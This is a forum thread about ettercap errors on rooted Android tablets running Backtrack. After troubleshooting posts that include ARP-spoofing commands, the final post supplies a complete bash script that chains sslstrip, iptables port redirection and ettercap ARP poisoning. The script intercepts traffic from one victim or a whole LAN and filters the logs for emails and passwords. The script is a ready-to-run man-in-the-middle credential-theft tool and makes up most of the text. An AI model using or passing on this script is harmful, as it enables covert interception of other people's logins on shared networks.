Ettercap Error on Motorola Xoom Wifi

[Conrthomas]

I have a rooted Xoom wifi, and I have configured it to run Backtrack5 in the terminal through ConnectBot and in the X through vnc.

I have been been trying to use ettercap for testing purposes, but I get an error every time. Here is exactly what happens:

ettercap -C
Sniff > Unified Sniffing
wlan0
Hosts > Scan for Hosts

and then I always get the error:
"
FATAL ERROR: Interface not suitable for layer2 sending

ip_forwarding was disabled, but we cannot re-enable it now.
remember to re-enable it manually.
"

Does anyone have any thoughts on this? I know that people have gotten it to work before, but I'm not sur what tweaks might need to be made.

[J0hnnyb14z3]

double check wlan0 is your correct interface (ifconfig) then launch ettercap in text mode..

Code:

ettercap -Tq -i wlan0 -M arp // //

if the host scan fails there then you may want to fire up wireshark and see if you get a probe to each ip address from ettercap.. layer 2 is data link layer and usually deals with discovery or exchange of data between nodes on a lan.. ARP uses layer 2 if I am correct (someone please correct me if i'm wrong) since it's mac based and could be part of your problem.. Also, make sure your network device isn't busy from another process.. try rebooting and reconnecting to the LAN if all else fails.. I've been battling ettercap lately myself and it's definitely a buggy lil thing sometimes! best of luck!

[Conrthomas]

Thanks, I'll try that.

[notToday1024]

I've got the same sorta problem... but on my transformer prime. I did an ifconfig and it seems that wlan0 is the correct interface. If I run just ettercap -T, I can sniff, but if I run

Code:

ettercap -Tq -M arp // //

, I get the above mentioned error. I also get...

Code:

SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 65534 GID 65534...

[Cr0wZz]

Sorry to revive a dead thread (possibly? ) but I had an idea. Just use ettercap to sniff in text mode and then write the captured stuff
Eg

Code:

Ettercap -T -w /tmp/capfile.pcap

Let it run for awhile and then import in the GUI :]

Should work. I'm about to try

[blackhawk2292]

I'm having the same issue with my Galaxy Tab 2. Any resolution? Google searches have yielded none.

[mitchboy007]

hey, i got a galaxy tab 2 and im having the same problem. no solution on google so i started doing some tests.
first i started checking if wireshark on another host gets any packages from ettercap. resulted in no packages being sent by ettercap... and in the error report i found that my galaxy "isnt suitable" for this so i guess our network card cant handle it for some reason?
i also tried everything with console mode, gui mode and messed around with the wlan0 and mac addresses but NOTHING worked.

i hope to get some answers soon! because i cant figure out WHY it wont work...

[wocar]

I modded the following script, and works smooth on SGS3 (sslstrip + ettercap)

Code:

#!/bin/bash
#  Nombre: sslsnif.sh
#   Autor: foro backtrack
#   Credits to: dsniff-fr0g
#   Modified by [W][0][C][@][R]

txtred='\e[01;31m' # Red
txtdef='\e[0;00m'
txtblue='\e[01;34m'
function po () {
echo ""
echo "#####################################"

echo "Interface      $IFACE"
echo "Local MAC      $tmac"
echo "Subnet         $dbcast"
echo "Local IP       $tlocalip"
echo "Folder         /root/capture/$SESSION/"
echo "Filter         $filter"
echo -e "Attack Mode    ${txtred}$MODE${txtdef}"


if [ "$ROUTER" = "" ]
then
        echo  -e "Gateway        ${txtblue}*${txtdef}"
else
        echo  -e "Gateway        ${txtblue}$ROUTER${txtdef}"
fi

if [ "$VICTIM" = "" ]
then
        echo -e  "Target         ${txtblue}*${txtdef}"
else
        echo -e "Target         ${txtblue}$VICTIM${txtdef}"
fi

#echo "Ettercap: ettercap -T -i $IFACE -w /root/$SESSION/$SESSION.pcap -L /root/$SESSION/$SESSION -M arp /$ROUTER/ /$VICTIM/"
echo "#####################################"
echo ""

}

function usage()
{
cat << EOF
usage: $0 options

Script helper for SSLSTRIP MITM attacks

OPTIONS:
   -n      No spoof (will not run ettercap)
   -f      Filter (ex: 'grep username', or '-f NOF' )
   -w      Write logs to dir in /root/capture/example
   -i      Interface (default:wlan0)
   -m      Moo
EOF
}

IFACE="wlan0"
dgateway=`route|grep default|grep wlan0|awk '{print $2}'| awk '{split($0,array," ")} END{print array[1]}'`
dbcast=`ifconfig wlan0|grep Bcast | awk '{split($0,array," ")} END{print array[3]}'|cut -d":" -f2 | cut -d '.' -f1-3`
tmac=`ifconfig wlan0|grep HWaddr | awk '{split($0,array," ")} END{print array[5]}'`
tlocalip=`ifconfig wlan0|grep Bcast | awk '{split($0,array," ")} END{print array[2]}'|cut -d":" -f2`
norun="false"
SESSION=
defaultfilter='egrep -i "email|pass"'

while getopts "hnm?:i:f:w:" OPTION
do
     case $OPTION in
         h)
             usage
             exit 1
             ;;
         n)
             norun="true"
             ;;
         w)
             SESSION=$OPTARG
             ;;
         i)
             IFACE=$OPTARG
             ;;
         m)
             echo "MOOO"
              exit 1
             ;;
          f)
             defaultfilter=$OPTARG
              exit 1
             ;;

         ?)
             usage
             exit
             ;;
     esac
done



VICTIM=null
ROUTER=null
filter=none
if [ "$SESSION" = "" ]
then
        echo -n "Folder to save logs: /root/capture/"
        read -e SESSION
fi

echo -n "Target IP (blank = whole ARP network) - $dbcast."
read -e host
if [ "$host" = "" ]
then
        VICTIM=""
        ROUTER=""
else
        VICTIM="$dbcast.$host"
        echo -n "Gateway IP (blank = $dgateway): "
        read -e gate
        if [ "$gate" = "" ]
        then
                ROUTER="$dgateway"
        fi

fi

echo -n "Filter for tail: (blank = $defaultfilter)"
read -e filter
if [ "$filter" = "" ]
then
        filter="$defaultfilter"
fi
if [ "$VICTIM" = "" ]
then

        MODE="ALL NETWORK"
else
        MODE="SINGLE IP"
fi

po

echo -n "Staring in "
for ((seconds=4; seconds > 0; seconds--)); do echo -n "$seconds.. "; sleep 1; done;
echo "GO"
sleep 2
clear
#------------- start ---------------

echo "==================================="
mkdir /root/capture/$SESSION/
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
sslstrip -p -l 1338 -k -w /root/capture/$SESSION/$SESSION.log &
sleep 3
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1338
sleep 3
tail /root/capture/$SESSION/$SESSION.log -f -n 10 | eval $filter &
if [ "$norun" = "true" ]
then
       echo "Not launching MITM attack (-n)"
       read -p "Press [Enter] key to end the attack..."
else
        ettercap -T -i $IFACE -w /root/capture/$SESSION/$SESSION.pcap -L /root/capture/$SESSION/$SESSION -M arp /$ROUTER/ /$VICTIM/
fi
#urlsnarf -i $IFACE | grep http > /root/capture/$SESSION/$SESSION.txt &


#"$XTRACT"tcpxtract -f /root/capture/$SESSION/$SESSION.pcap
#"$NOYES"wireshark &
killall tail
killall sslstrip
killall ettercap
killall python
killall urlsnarf
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
clear
etterlog -p -i /root/capture/$SESSION/$SESSION.eci
po
echo "Show sslstrip log? blank = yes: "
read -e byes
"$byes"cat /root/capture/$SESSION/$SESSION.log